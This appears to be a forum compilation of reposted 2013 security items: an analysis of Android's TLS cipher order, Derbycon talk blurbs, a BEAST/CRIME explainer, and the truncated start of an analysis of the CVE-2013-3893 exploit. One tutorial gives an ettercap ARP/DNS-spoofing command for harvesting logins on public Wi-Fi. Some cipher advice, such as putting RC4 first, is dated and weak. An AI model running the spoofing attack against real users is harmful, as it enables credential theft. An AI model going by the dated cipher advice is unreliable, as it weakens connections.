minimal test program (APK, source) and single-stepped it to find the origin of the default cipher list. It turned out to be in Android's libcore package, NativeCrypto.getDefaultCipherSuites() which returns a hardcoded String array starting with "SSL_RSA_WITH_RC4_128_MD5". Diving Into the Android Source Going back on that file's change history revealed interesting things, like the addition of TLS v1.1 and v1.2 and its almost immediate removal with a suspicious commit message (taking place between Android 4.0 and 4.1, possible reasoning), added support for Elliptic Curves and AES256 in Android 3.x, and finally the addition of our hardcoded string list sometime before Android 2.3: public static String[] getDefaultCipherSuites() {- int ssl_ctx = SSL_CTX_new(); - String[] supportedCiphers = SSL_CTX_get_ciphers(ssl_ctx); - SSL_CTX_free(ssl_ctx); - return supportedCiphers; + return new String[] { + "SSL_RSA_WITH_RC4_128_MD5", + "SSL_RSA_WITH_RC4_128_SHA", + "TLS_RSA_WITH_AES_128_CBC_SHA", ... + "SSL_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA", + "SSL_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA" + }; } The commit message tells us: We now have a default cipher suite list that is chose to match RI behavior and priority, not based on OpenSSLs default and priorities. Translated into English: before, we just used the list from OpenSSL (which was really good), now we make our own list... with blackjack! ...and hookers! with RC4! ...and MD5! The test suite comes with another hint: // Note these are added in priority order as defined by RI 6 documentation. That RI 6 for sure has nothing to do with MI 6, but stands for Reference Implementation, the Sun (now Oracle) Java SDK version 6. So what the fine Google engineers did to reduce our security was merely to copy what was there, defined by the inventors of Java! Cipher Order in the Java Runtime In the Java reference implementation, the code responsible for creating the cipher list is split into two files. First, a priority-ordered set of ciphers is constructed in the CipherSuite class: // Definition of the CipherSuites that are enabled by default. // They are listed in preference order, most preferred first. int p = DEFAULT_SUITES_PRIORITY * 2; add("SSL_RSA_WITH_RC4_128_MD5", 0x0004, --p, K_RSA, B_RC4_128, N); add("SSL_RSA_WITH_RC4_128_SHA", 0x0005, --p, K_RSA, B_RC4_128, N); ... Then, all enabled ciphers with sufficient priority are added to the list for CipherSuiteList.getDefault(). The cipher list has not experienced relevant changes since the initial import of Java 6 into Hg, when the OpenJDK was brought to life. Going back in time reveals that even in the 1.4.0 JDK, the first one incorporating the JSEE extension for SSL/TLS, the list was more or less the same: [TABLE] [TR] [TH]Java 1.4.0 (2002)[/TH] [TH]Java 1.4.2_19, 1.5.0 (2004)[/TH] [TH]Java 1.6 (2006)[/TH] [/TR] [TR] [TD]SSL_RSA_WITH_RC4_128_SHA[/TD] [TD]SSL_RSA_WITH_RC4_128_MD5[/TD] [TD]SSL_RSA_WITH_RC4_128_MD5[/TD] [/TR] [TR] [TD]SSL_RSA_WITH_RC4_128_MD5[/TD] [TD]SSL_RSA_WITH_RC4_128_SHA[/TD] [TD]SSL_RSA_WITH_RC4_128_SHA[/TD] [/TR] [TR] [TD]SSL_RSA_WITH_DES_CBC_SHA[/TD] [TD]TLS_RSA_WITH_AES_128_CBC_SHA[/TD] [TD]TLS_RSA_WITH_AES_128_CBC_SHA[/TD] [/TR] [TR] [TD]SSL_RSA_WITH_3DES_EDE_CBC_SHA[/TD] [TD]TLS_DHE_RSA_WITH_AES_128_CBC_SHA[/TD] [TD]TLS_DHE_RSA_WITH_AES_128_CBC_SHA[/TD] [/TR] [TR] [TD]SSL_DHE_DSS_WITH_DES_CBC_SHA[/TD] [TD]TLS_DHE_DSS_WITH_AES_128_CBC_SHA[/TD] [TD]TLS_DHE_DSS_WITH_AES_128_CBC_SHA[/TD] [/TR] [TR] [TD]SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA[/TD] [TD]SSL_RSA_WITH_3DES_EDE_CBC_SHA[/TD] [TD]SSL_RSA_WITH_3DES_EDE_CBC_SHA[/TD] [/TR] [TR] [TD]SSL_RSA_EXPORT_WITH_RC4_40_MD5[/TD] [TD]SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA[/TD] [TD]SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA[/TD] [/TR] [TR] [TD]SSL_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA[/TD] [TD]SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA[/TD] [TD]SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA[/TD] [/TR] [TR] [TD]SSL_RSA_WITH_NULL_MD5[/TD] [TD]SSL_RSA_WITH_DES_CBC_SHA[/TD] [TD]SSL_RSA_WITH_DES_CBC_SHA[/TD] [/TR] [TR] [TD]SSL_RSA_WITH_NULL_SHA[/TD] [TD]SSL_DHE_RSA_WITH_DES_CBC_SHA[/TD] [TD]SSL_DHE_RSA_WITH_DES_CBC_SHA[/TD] [/TR] [TR] [TD]SSL_DH_anon_WITH_RC4_128_MD5[/TD] [TD]SSL_DHE_DSS_WITH_DES_CBC_SHA[/TD] [TD]SSL_DHE_DSS_WITH_DES_CBC_SHA[/TD] [/TR] [TR] [TD]SSL_DH_anon_WITH_DES_CBC_SHA[/TD] [TD]SSL_RSA_EXPORT_WITH_RC4_40_MD5[/TD] [TD]SSL_RSA_EXPORT_WITH_RC4_40_MD5[/TD] [/TR] [TR] [TD]SSL_DH_anon_WITH_3DES_EDE_CBC_SHA[/TD] [TD]SSL_RSA_EXPORT_WITH_DES40_CBC_SHA[/TD] [TD]SSL_RSA_EXPORT_WITH_DES40_CBC_SHA[/TD] [/TR] [TR] [TD]SSL_DH_anon_EXPORT_WITH_RC4_40_MD5[/TD] [TD]SSL_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA[/TD] [TD]SSL_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA[/TD] [/TR] [TR] [TD]SSL_DH_anon_EXPORT_WITH_DES40_CBC_SHA[/TD] [TD]SSL_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA[/TD] [TD]SSL_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA[/TD] [/TR] [TR] [TD][/TD] [TD][/TD] [TD]TLS_EMPTY_RENEGOTIATION_INFO_SCSV[/TD] [/TR] [/TABLE] The original list resembles the CipherSpec definition in RFC 2246 from 1999, sorted numerically with the NULL and 40-bit ciphers moved down. Somewhere between the first release and 1.4.2, DES was deprecated, TLS was added to the mix (bringing in AES) and MD5 was pushed in front of SHA1 (which makes one wonder why). After that, the only chage was the addition of TLS_EMPTY_RENEGOTIATION_INFO_SCSV, which is not a cipher but just an information token for the server. Java 7 added Elliptic Curves and significantly improved the cipher list in 2011, but Android is based on JDK 6, making the effective default cipher list over 10 years old now. Conclusion The cipher order on the vast majority of Android devices was defined by Sun in 2002 and taken over into the Android project in 2010 as an attempt to improve compatibility. RC4 is considered problematic since 2001 (remember WEP?), MD5 was broken in 2009. The change from the strong OpenSSL cipher list to a hardcoded one starting with weak ciphers is either a sign of horrible ignorance, security incompetence or a clever disguise for an NSA-influenced manipulation - you decide! (This was before BEAST made the other ciphers in TLS less secure in 2011 and RC4 gained momentum again) All that notwithstanding, now is the time to get rid of RC4-MD5, in your applications as well as in the Android core! Call your representative on the Google board and let them know! Appendix A: Making your app more secure If your app is only ever making contact to your own server, feel free to choose the best cipher that fits into your CPU budget! Otherwise, it is hard to give generic advice for an app to support a wide variety of different servers without producing obscure connection errors. Update: Server-Side Changes The cipher priority order is defined by the client, but the server has the option to override it with its own. Server operators should read the excellent best practices document by SSLLabs. Further resources for server admins: Mozilla OpSec guide Apache config helper for Debian/Wheezy Changing the client cipher list For client developers, I am recycling the well-motivated browser cipher suite proposal written by Brian Smith at Mozilla, even though I share Bruce Schneier's scepticism on EC cryptography. The following is a subset of Brian's ciphers which are supported on Android 4.2.2, and the last three ciphers are named SSL_ instead of TLS_ (Warning: BEAST ahead!). // put this in a place where it can be reusedstatic final String ENABLED_CIPHERS[] = { "TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA", "TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA", "TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA", "TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA", "TLS_DHE_RSA_WITH_AES_128_CBC_SHA", "TLS_DHE_RSA_WITH_AES_256_CBC_SHA", "TLS_DHE_DSS_WITH_AES_128_CBC_SHA", "TLS_ECDHE_RSA_WITH_RC4_128_SHA", "TLS_ECDHE_ECDSA_WITH_RC4_128_SHA", "TLS_RSA_WITH_AES_128_CBC_SHA", "TLS_RSA_WITH_AES_256_CBC_SHA", "SSL_RSA_WITH_3DES_EDE_CBC_SHA", "SSL_RSA_WITH_RC4_128_SHA", "SSL_RSA_WITH_RC4_128_MD5", }; // get a new socket from the factory SSLSocket s = (SSLSocket)sslcontext.getSocketFactory().createSocket(host, port); // IMPORTANT: set the cipher list before calling getSession(), // startHandshake() or reading/writing on the socket! s.setEnabledCipherSuites(ENABLED_CIPHERS); ... Use TLS v1.2! By default, TLS version 1.0 is used, and the more recent protocol versions are disabled. Some servers used to be broken when contacted using v1.2, so this approach seemed a good conservative choice over a year ago. At least for XMPP, an attempt to enforce TLS v1.2 is being made. You can follow with your own app easily: // put this in a place where it can be reusedstatic final String ENABLED_PROTOCOLS[] = { "TLSv1.2", "TLSv1.1", "TLSv1" }; // put this right before setEnabledCipherSuites()! s.setEnabledProtocols(ENABLED_PROTOCOLS); Use NetCipher! NetCipher is an Android library made by the Guardian Project to improve network security for mobile apps. It comes with a StrongTrustManager to do more thorough certificate checks, an independent Root CA store, and code to easily route your traffic through the Tor network using Orbot. Use AndroidPinning! AndroidPinning is another Android library, written by Moxie Marlinspike to allow pinning of server certificates, improving security against government-scale MitM attacks. Use this if your app is made to communicate with a specific server! Use MemorizingTrustManager! MemorizingTrustManager by yours truly is yet another Android library. It allows your app to ask the user if they want to trust a given self-signed/untrusted certificate, improving support for regular connections to private services. If you are writing an XMPP client or a private cloud sync app, use this! Appendix B: Apps that do care Android Browser Checks of the default Android Browser revealed that at least until Android 2.3.7 the Browser was using the default cipher list of the OS, participating in the RC4 regression. As of 4.2.2, the Browser comes with a longer, better, stronger cipher list: ECDHE-RSA-AES256-SHA ECDHE-ECDSA-AES256-SHA SRP-DSS-AES-256-CBC-SHA SRP-RSA-AES-256-CBC-SHA DHE-RSA-AES256-SHA DHE-DSS-AES256-SHA ECDH-RSA-AES256-SHA ECDH-ECDSA-AES256-SHA AES256-SHA ECDHE-RSA-DES-CBC3-SHA ECDHE-ECDSA-DES-CBC3-SHA SRP-DSS-3DES-EDE-CBC-SHA SRP-RSA-3DES-EDE-CBC-SHA EDH-RSA-DES-CBC3-SHA EDH-DSS-DES-CBC3-SHA ECDH-RSA-DES-CBC3-SHA ECDH-ECDSA-DES-CBC3-SHA DES-CBC3-SHA ECDHE-RSA-AES128-SHA ECDHE-ECDSA-AES128-SHA SRP-DSS-AES-128-CBC-SHA SRP-RSA-AES-128-CBC-SHA DHE-RSA-AES128-SHA DHE-DSS-AES128-SHA ECDH-RSA-AES128-SHA ECDH-ECDSA-AES128-SHA AES128-SHA ECDHE-RSA-RC4-SHA ECDHE-ECDSA-RC4-SHA ECDH-RSA-RC4-SHA ECDH-ECDSA-RC4-SHA RC4-SHA RC4-MD5 Update: Surprisingly, the Android WebView class (tested on Android 4.0.4) is also using the better ciphers. Update: Google Chrome The Google Chrome browser (version 30.0.1599.82, 2013-10-11) serves the following list: ECDHE-RSA-AES256-GCM-SHA384 ECDHE-ECDSA-AES256-GCM-SHA384 ECDHE-RSA-AES256-SHA ECDHE-ECDSA-AES256-SHA DHE-DSS-AES256-GCM-SHA384 DHE-RSA-AES256-GCM-SHA384 DHE-RSA-AES256-SHA256 DHE-DSS-AES256-SHA256 DHE-RSA-AES256-SHA DHE-DSS-AES256-SHA AES256-GCM-SHA384 AES256-SHA256 AES256-SHA ECDHE-RSA-DES-CBC3-SHA ECDHE-ECDSA-DES-CBC3-SHA EDH-RSA-DES-CBC3-SHA EDH-DSS-DES-CBC3-SHA DES-CBC3-SHA ECDHE-RSA-AES128-GCM-SHA256 ECDHE-ECDSA-AES128-GCM-SHA256 ECDHE-RSA-AES128-SHA256 ECDHE-ECDSA-AES128-SHA256 ECDHE-RSA-AES128-SHA ECDHE-ECDSA-AES128-SHA DHE-DSS-AES128-GCM-SHA256 DHE-RSA-AES128-GCM-SHA256 DHE-RSA-AES128-SHA256 DHE-DSS-AES128-SHA256 DHE-RSA-AES128-SHA DHE-DSS-AES128-SHA AES128-GCM-SHA256 AES128-SHA256 AES128-SHA ECDHE-RSA-RC4-SHA ECDHE-ECDSA-RC4-SHA RC4-SHA RC4-MD5 This one comes with AES256-GCM and SHA384! Good work, Google! Now please go and make these the default for the Android runtime! Update: Firefox Firefox Browser for Android (version 24.0 from F-Droid) comes with its own cipher suite as well. However, contrary to Chrome, it is missing the GCM ciphers to mitigate the BEAST attack. ECDHE-ECDSA-AES256-SHA ECDHE-RSA-AES256-SHA DHE-RSA-CAMELLIA256-SHA DHE-DSS-CAMELLIA256-SHA DHE-RSA-AES256-SHA DHE-DSS-AES256-SHA ECDH-RSA-AES256-SHA ECDH-ECDSA-AES256-SHA CAMELLIA256-SHA AES256-SHA ECDHE-ECDSA-RC4-SHA ECDHE-ECDSA-AES128-SHA ECDHE-RSA-RC4-SHA ECDHE-RSA-AES128-SHA DHE-RSA-CAMELLIA128-SHA DHE-DSS-CAMELLIA128-SHA DHE-RSA-AES128-SHA DHE-DSS-AES128-SHA ECDH-RSA-RC4-SHA ECDH-RSA-AES128-SHA ECDH-ECDSA-RC4-SHA ECDH-ECDSA-AES128-SHA SEED-SHA CAMELLIA128-SHA RC4-SHA RC4-MD5 AES128-SHA ECDHE-ECDSA-DES-CBC3-SHA ECDHE-RSA-DES-CBC3-SHA EDH-RSA-DES-CBC3-SHA EDH-DSS-DES-CBC3-SHA ECDH-RSA-DES-CBC3-SHA ECDH-ECDSA-DES-CBC3-SHA FIPS-3DES-EDE-CBC-SHA DES-CBC3-SHA My favorite pick from that list: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA. Enabling TLSv1.2 does not change the cipher list. BEAST is mitigated in TLSv1.2, but the Lucky13 attack might still bite you. Send In Your App! If you have an Android app with a significant user base that has a better cipher list, let me know and I will add it to the list. Further Reading Real World Crypto 2013 by Adam Langley from Google Why does the web still run on RC4? by Luke Mather SSL/TLS in a Post-PRISM Era CyanogenMod issue Android issue #61085 Test your browser Comments: HN, Slashdot, Reddit Sursa: Why Android SSL was downgraded from AES256-SHA to RC4-MD5 in late 2010

SSL/TLS IN A POST-PRISM ERA This is a collection of information related to the security of Secure Socket Layer (SSL) and Transport Layer Security (TLS). The aim of this page is to keep track of the current limitations and security problems in SSL/TLS and HTTPS. The biggest unsolved problem is the trust model of the Certification Authorities.All of these problems have been known for some time. These problems are mainly discussed and talked about at special security conferences to an audience that only contains security experts. These issues are rarely discussed with the general public or developers who use SSL/TLS in their projects. We aim to raise awareness of these problems outside of the security community. Contents Introduction What is SSL/TLS and CA The biggest problem with SSL/TLS ROOT-CA Security Breaches Dutch CA DigiNotar Etisalat NSA's PRISM project Other Incidents [*]Attacks Self Signed Certificates SSL Strip [*]Other Problems Weak Certificate Keys Disconnected Security Community [*]Solutions Online Certificate Status Protocol CA Regulation HTTP Strict Transport Security EFF HTTPS Everywhere Certificate Pinning Double Signed Certificates Reverse Fingerprint SSL Sovereign Keys RFC 6962 Certificate Transparency SSL Convergence DNS-SEC DANE [*]Summary of best known immediate solution BCP or RFC for HTTPS For Certificate Verification in General for applications in general [*]Further Reading Sursa: https://wiki.thc.org/ssl

Derbycon 2013 - Ownage From Userland: Process Puppeteering - Nick Cano Description: This offensive talk highlights a myriad of sneaky methods for manipulating processes on owned boxes. The talk will focus on tricks which can happily execute from userland and has a broad spectrum of applications which include ring-3 rootkit development, game hacking, virus development, and software augmentation. Bio: Nick Cano is a twenty year-old reverse engineer and software developer, with eight years of experience in software development and game exploitation. Along side his day job as a Programmer Analyst, Nick also runs a game hacking company which produces autonomous software capable of not only playing games, but also completely manipulating their environment and control flow. His experience includes malware analysis, binary reverse engineering, Windows system internals manipulation, userland rootkit development, and software automation. For More Information please visit : - DerbyCon : Louisville, Kentucky Derbycon 2013 Videos (Hacking Illustrated Series InfoSec Tutorial Videos) Sursa: Derbycon 2013 - Ownage From Userland: Process Puppeteering - Nick Cano

Using Social Engineering Toolkit - Credential Harvester Attack Description: This is Video Four on using The Social Engineering Toolkit on Backtrack Linux & Kali Linux. In this video i will show you how to use a credential harvester Attack using a Cloned Website and ettercap with dns_spoof. We will be attacking victims over a LAN (Local Area Network) However this is possible to do outside a network if you wanted to however i won't be explaining that in this video. Programs Used: Kali Linux SET - Social Engineering Tool Kit ettercap dns_spoof Browsers used: Google Chrome Commands used: nano /usr/share/ettercap/etter.dns Command allows us to edit the etter.dns that we will be redirecting cloned website to our lan ip on the network. ettercap -i wlan0 -T -q -P dns_spoof -M ARP:remote // // Change the wlan0 to whatever you're wireless interface name using iwconfig or ifconfig Take in mind this is being done over a wireless network. This can be used to get logins for facebook if your at a public wireless place. My websites: PhiberOptics - YouTube Matthew H Knight | Computer and Network Security Enthusiast http://twitter.com/ZaraByte http://facebook.com/ZaraByte Sursa: Using Social Engineering Toolkit - Credential Harvester Attack

Derbycon 2013 - New Shiny In The Metasploit Framework - Egypt Description: st like you. This talk will be a grab bag of some of the awesome new capabilities in the Framework from the last year, including Android Meterpreter, some fun new protocols, and new ways to make writing exploits and owning boxes easier. Bio: James Lee, more commonly known as egypt, is a software developer for Rapid7 where he is a core developer for the Metasploit Framework. His work at Rapid7 has allowed him to synergistically mesh enterprise-wide pentesting on an "organic" level. James has several unique talents, the most notable of which is the ability to play drunken chess and still beat sober people. Additionally, James has a 4 foot mohawk which is rumored to stand up by itself with no product. Before breaking into Infosec, egypt played back up guitar for GG Allin and the Scumfucs. For More Information please visit : - DerbyCon : Louisville, Kentucky Derbycon 2013 Videos (Hacking Illustrated Series InfoSec Tutorial Videos) Sursa: Derbycon 2013 - New Shiny In The Metasploit Framework - Egypt

Derbycon 2013 - Sql Injection With Sqlmap - Conrad Reynolds Cisa Description: When hacking websites, SQL injection is a very popular way read or change data that you’re not supposed to have access to. Sqlmap is a powerful and free tool that enables you to find and exploit SQL injection vulnerabilities. Come see how to use sqlmap to attack websites and control databases (but only for the forces of good, please). Bio:Conrad has held a variety of positions in IT Audit, Application Development, Management, and Web Security in Fortune 50, non-profit,and government sectors. He has been implementing and advising on IT security solutions for several years. He currently hacks government web apps for a living. For More Information please visit : - DerbyCon : Louisville, Kentucky Derbycon 2013 Videos (Hacking Illustrated Series InfoSec Tutorial Videos) Sursa: Derbycon 2013 - Sql Injection With Sqlmap - Conrad Reynolds Cisa

Derbycon 2013 - Hello Asm World: A Painless And Contextual Introduction To X86 Assembly - Nicolle Neulist (Rogueclown) Description: Familiarity with assembly language is essential if you are interested in writing custom exploits, performing reverse engineering of binaries, or analyzing malware. Getting started with assembly can seem daunting at first: the instructions don’t resemble familiar higher-level instructions very closely. However, with a bit of knowledge of computer memory and a bit of context with both higher-level languages and simple yet useful code, programming useful things in assembly becomes a lot easier. This talk will explain basic principles of programming in x86 assembly language, provide concrete examples of simple functions implemented in assembly beside that same functionality implemented in a higher-level language, and demonstrate basic techniques for writing custom shellcode. No experience programming in assembly language is expected, though some basic experience programming in a higher-level language is helpful. Bio: nicolle neulist, otherwise known as rogueclown, is a geek from Chicago. Professionally, she is an associate security consultant with Accuvant LABS. Personally, she likes messing around with computers, playing in CTFs with #misec, singing anywhere she gets the chance, and wandering her hometown in search of fun places to go. She entered the field of information security thanks to the support of countless awesome people in the community, and she is passionate about helping new people interested in the field to find their way. She presented a talk about writing security tools in Python on the Teach Me track at DerbyCon 2.0, and has served as a speaker mentor at Security B-Sides Las Vegas in both 2012 and 2013. For More Information please visit : - DerbyCon : Louisville, Kentucky Derbycon 2013 Videos (Hacking Illustrated Series InfoSec Tutorial Videos) Sursa: Derbycon 2013 - Hello Asm World: A Painless And Contextual Introduction To X86 Assembly - Nicolle Neulist (Rogueclown)

BEAST vs. CRIME Attack Albert Fruz October 14, 2013 Some months ago there was a top story popping up in almost all the security news feeds about CRIME attacks being able to break SSL. In this article, I would like to pin down what CRIME attacks and BEAST attacks are and how to protect against these attacks to create a safe atmosphere. First we will look at the BEAST attack and later we will explain its successor, the CRIME attack. BEAST Attack The BEAST (browser exploit against SSL/TLS) was developed by researchers Thai Duong and Juliano Rizzo and can be carried out on TLS v1.0.TLS v 1.2 is not vulnerable to a BEAST attack. The CVE for a BEAST attack is CVE-2011-3389. Whenever you log in to any https page, after your authentication you can see your authenticated page and, if you look carefully at the URL, you can see the session ID. A session ID is a random number or combination of numbers and string that maintains the state of the page; it is assigned by the website server to the client browser. The Session ID can be found either in the cookie or in the URL of the web browser .Usually, all the session IDs will be encrypted to prevent hijacking of the session. I can break down this BEAST attack into three steps for simplicity. Step 1: An attacker sends a malicious JavaScript to run on your machine (this can be sent via CSRF, Social engineering ,A Drive-by download, the returned page can contain a JavaScript, etc.).This malicious script runs on the victim’s machine and can capture the entire header info and the encrypted cookie that is assigned from the web server (running TLS 1.0) and can then send the information to any website. Step 2: SSL/TLS can encrypt data with two kinds of ciphers: block ciphers, such as AES and DES, and stream ciphers like RC4.TLS v1.0 gives precedence to the block cipher rather than stream ciphers. This is where our vulnerability exists. If we have two identical plain text messages then, after encryption, we have the same cipher text so the pattern in plaintext is reflected in the cipher text. This is bad. In order to prevent this, we use cipher block chaining (CBC mode chaining).In CBC, if we want to encrypt block A, first we need to XOR with A-1. If it is the first block we cannot XOR with A-1 data so here we take the initialization vector. Step 3: The attacker compares the encrypted session details and the unencrypted data sent by the script to find the initialization vector. Once you get this information, we could decrypt the future cookies sent from the web server. You can check whether your website is vulnerable to BEAST attacks by doing a scan from SSL Labs: https://www.ssllabs.com/index.html. Workaround for BEAST Attacks Mitigation Open the Local Group Policy Editor. At a command prompt, enter “gpedit.msc”. The Group Policy Object Editor appears. Expand Computer Configuration, Administrative Templates, and Network, and then click SSL Configuration Settings. Under SSL Configuration Settings, double click the SSL Cipher Suite Order setting. The cipher suites, TLS_RSA_WITH_RC4_128_SHA and TLS_RSA_WITH_RC4_128_MD5, must be put first on the line. CRIME (Compression Ratio Info-Leak Mass Exploitation) CRIME (compression ratio info-leak made easy/compression ratio info-leak mass exploitation) is a new attack that was developed by two security researchers, Juliano Rizzo and Thai Duong. It decrypts the session cookies from the hypertext transfer protocol secure (HTTPS) connections by means of brute force. The so-called CRIME attack induces a vulnerable web browser into percolating a cookie authentication, created when a user starts a HTTPS session with a website. The obtained cookie can be used by hackers to log in to the victim’s account on the site. The cookie is obtained by tricking the browser into sending encrypted compressed requests to secure websites and exploiting the information negligently leaked in the process. Some extra data that has been tweaked by malicious JavaScript code is also embedded along with the cookies within each request. The differences in size of the compressed messages are measured to determine the cookie’s contents, character by character. This is possible because TLS/SSL and SPDY use a compression algorithm called DEFLATE, which works by eliminating duplicate strings. CRIME works against TLS/SSL Compression and SPDY (a special HTTP-like protocol developed by Google, and used sparingly around the web). The recent statistics gathered by SSL Pulse show that about 42% of the servers support SSL compression and 0.8% supports SPDY. SSL compression, as it is an optional feature that may or may not be enabled by default –it’s not necessary to be explicitly configured. However, SPDY would be explicitly designed into your web application. Vulnerable Systems TLS 1.0. SPDY protocol (Google). Applications that uses TLS compression. Mozilla Firefox (older versions) that support SPDY. Google Chrome (older versions) that supported both TLS and SPDY. Mechanism of the C.R.I.M.E Attack Analysis To understand the CRIME weakness, we need to understand the working of lossless data compression in SPDY and TLS/SSL (DEFLATE algorithm). Lossless data compression finds the redundancies in the body of the data and then these redundancies are represented in a smaller fashion. Consider this example: Assume that “AAAAABCDEFGH” is the source data that is being transported across a HTTPS connection. The mechanism of compression algorithm replaces the redundant sequence “AAAAA” with “5A,” thereby achieving a 25% compression ratio. Hence we get AAAAABCDEFGH = 5ABCDEFGH. Encrypted data has no redundancies and the output should be uniformly random. The encrypted output pattern gives information on how the data is being encrypted and some hints about the input data. So, for the effective working of compression plus encryption in the TLS/SSL, the input should be first compressed and then encrypted. Let’s consider two strings that use the compression scheme and encrypt the output. [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7[/TD] [TD=class: code]Data (Source) Compressed Encrypted ****************************************************************** ABCDEFGHIJKL = ABCDEFGHIJKL = Z@%fkT2r$#!B AAAAABCDEFGH = 5ABCDEFGH = jhG*4m#$A [/TD] [/TR] [/TABLE] We find that the first string, “ABCDEFGHIJKL,” is not compressed because it doesn’t contain any redundancy. The second string, “AAAAABCDEFGH,” is compressed because it does contain a redundancy, thus the encrypted output is made smaller. When comparing the string outputs, we find that compression happens before encryption and also that the encrypted output of the second string is shorter than the encrypted output of the first string. Thus we could conclude that the encrypted output of the second string has more redundancy compared to the other string. Breaking Encryption by Analyzing the Compression Algorithm An attacker could decrypt the source data by understanding the underlying compression algorithm. Let us consider this example; [TABLE] [TR] [TD=class: gutter]1 2 3 4 5[/TD] [TD=class: code]Data (Source) Compressed Encrypted *************************************************** XYZABCDEFGHIJK = XYZABCDEFGHIJK = At9XeCNVxKt@XZC [/TD] [/TR] [/TABLE] It is obvious that the attacker doesn’t know what the source data and the compressed data, but he can see the encrypted data. In order to decrypt or find the unknown data, as a first step he adds an input “XYZ” along with the source data. At this point, he only knows his own input and the encrypted data. [TABLE] [TR] [TD=class: gutter]1 2 3 4 5[/TD] [TD=class: code]Data (Source) Compressed Encrypted **************************************************** XYZ [unknown Data] = [Totally Unknown] = At9XeCNVxKt@XZC [/TD] [/TR] [/TABLE] The “compression before encryption” associated with the security mechanism helps the attacker to find the unknown data, which purely depends on the value that is being supplied by the attacker, along with the unknown source data. Here the attacker tries three different input strings along with the source data. [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9[/TD] [TD=class: code]Data (Source) Compressed Encrypted ******************************************************* ZZZ [unknown Data] = [Totally Unknown] = QvnQSHvQWB3*QR YYY [unknown Data] = [Totally Unknown] = f*fB&M7sya*u7F AAA [unknown Data] = [Totally Unknown] = rAW^26uffH%8 [/TD] [/TR] [/TABLE] When the attacker inputs the string ‘AAA’ along with the source data, the redundancy of the data is increased and hence makes better compression of the data, thereby making the encrypted data length smaller. This in turn helps the attacker to confirm the existence of the string “A” in the source data. The attacker could repeat this technique with different values and infer the unknown source data fully. The offender adds some content in the source data, HTTP cookies (with session information). This data is compressed and encrypted. The attacker then analyzes the encrypted data by changing the control input, hence gaining insight into the redundancy of the data that gets compressed and ultimately learning the contents of the HTTP cookies. Mitigation A CRIME attack can be mitigated by disabling the compression mechanism of HTTPS requests. Therefore, the TLS/SSL auto compression of the web browsers/websites should be disabled. The compression method used on the server side is directly dependent on the compression mechanism on the client side, so if the data compression mechanism is disabled at the client side, the data at server side is automatically processed without compression, thereby preventing the CRIME attack. When the compression technique is enabled, use the cipher-chaining block (CBC) ciphers, which incorporate random padding up to 255 bytes. This technique would increase the number of trials an offender needs to infer the sensitive data. Implementing restrictions on cross-site requests known as CSRF (cross-site request forgery) on the client side helps to defeat the CRIME attack. TLS compression on the web servers should be. Upgrading web browsers, such as Mozilla and Chrome, that use TLS compression is recommended (IE browsers are not vulnerable to CRIME attacks). References Security impact of the Rizzo/Duong CBC "BEAST" attack - Educated Guesswork https://www.ssllabs.com/downloads/SSL_TLS_Deployment_Best_Practices_1.0.pdf https://www.phonefactor.com/resources/CipherSuiteMitigationForBeast.pdf Threatpost | The First Stop For Security News https://community.qualys.com/blogs/securitylabs/2012/09/14/crime-information-leakage-attack-against-ssltls https://isecpartners.com/blog/2012/september/details-on-the-crime-attack.aspx CRIME : New SSL/TLS attack for Hijacking HTTPS Sessions - The Hacker News The perfect CRIME? New HTTPS web hijack attack explained • The Register Security researchers to present new 'CRIME' attack against SSL/TLS | PCWorld Sursa: BEAST vs. CRIME Attack

Cum nu te descurci? Doar dai dublu click pe "start Wamp server" si gata. Pui fisierele PHP in c:\wamp\www si intri din browser pe http://127.0.0.1/ sau http://localhost/ Sau pentru un fisier anume: http://127.0.0.1/numefisier.php Vechi dar util: http://www.oriceon.com/tutorial_v2.1.rar

Te atrag catre niste servicii care initial par ok, apoi te vand ca pe niste legume in piata.

Lui M2G i-a fost retras statutul de moderator. Multumim pentru observatii.

Anatomy of an exploit - inside the CVE-2013-3893 Internet Explorer zero-day - Part 1 by Paul Ducklin on October 11, 2013 As you are probably aware, Microsoft's October 2013 Patch Tuesday includes an update for Internet Explorer that closes no fewer than ten RCEs, or Remote Code Execution holes. This sort of vulnerability means that merely looking at a booby-trapped web page could infect you with malware, even if you don't click on anything on the page. Unfortunately, an exploit that takes advantage of one those ten holes, CVE-2013-3893, is known to be in the wild. Cybercriminals have been using it; a proof-of-concept HTML page has been published that you can tweak for your own attacks; and the popular penetration tool Metasploit now includes it. So rather than just leave you to apply the patch and be done with it, we thought we'd look at this exploit in some detail. We hope that this will help you understand the lengths that cybercriminals will go to in order to attack your computer, despite the layers of protection that modern versions of Windows and Internet Explorer include. Don't worry if you aren't technical: we've tried to keep the assembler code and the programming jargon to a minimum. Just glide over anything you don't understand and get a feeling for how cyberattackers think - "know thine enemy" is a handy part of any defence. And, no, we haven't given away so much that you can turn this article into an attack of your own: it's an explanatory guide, not a how-to tutorial. The core of the hole Our attackers will be exploiting a bug in Internet Explorer's mouse capture functionality. In JavaScript, an object on an Internet Explorer web page can take or relinquish control over the mouse events that happen in the brower window, such as clicking and double-clicking. This is done using the functions setCapture() and releaseCapture(). An object can also declare an onclosecapture function, which will automatically be called if ever it loses control of the mouse, for example because another object calls setCapture() to take over. Our attackers seem to have discovered that these functions can be used to trick Internet Explorer, by orchestrating an unusual sequence of operations, something like this: [1] Create 10,000 items in the current web page, giving each one a title string of "3333....3333". [2] Free the memory of the last 5000 items by setting the title back to a blank string. [3] Create two more items, making one the parent of the other. [4] Set an onclosecapture event for the child item, in which 